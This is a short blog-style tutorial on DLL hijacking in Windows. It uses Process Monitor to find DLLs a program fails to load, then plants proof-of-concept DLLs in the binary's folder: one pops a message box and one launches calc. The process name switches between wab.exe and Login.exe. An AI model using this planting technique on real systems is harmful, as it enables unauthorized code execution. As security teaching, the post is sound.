We need Process Monitor tool, part of sysinternals tools for finding the Vulnerability.
Loading of non-existent Dynamic Linked Libraries (DLL's) for the process under analysis can be found using below Process Monitor filter
Process Name is wab.exe then Include
Path ends with .dll then Include
Result is NAME NOT FOUND then Include
Above Filter and Snapshot shows that Login.exe couldn't find DLL's SXS.dll, CLBCATQ.dll etc.
Created DLL with following Code and rename the DLL to any of SXS.dll, CLBCATQ.dll and copy to the path from where we are executing our vulnerable binary.
#include <windows .h>
#include <stdio .h>
#include <string .h>
BOOL APIENTRY DllMain( HMODULE hModule,DWORD fdwReason,LPVOID lpReserved)
{
MessageBox(NULL,L"DLL Injection by Disects !",
L"developed by Praveen Darshanam",
MB_ICONWARNING | MB_CANCELTRYCONTINUE | MB_DEFBUTTON2);
return TRUE;
}
Search the DLL we injected
To execute calculator we can use below code
#include <windows .h>
int exec_calc()
{
WinExec("calc", 0);
exit(0);
return 0;
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason,
LPVOID lpvReserved)
{
exec_calc();
return 0;
}
Done!
No comments:
Post a Comment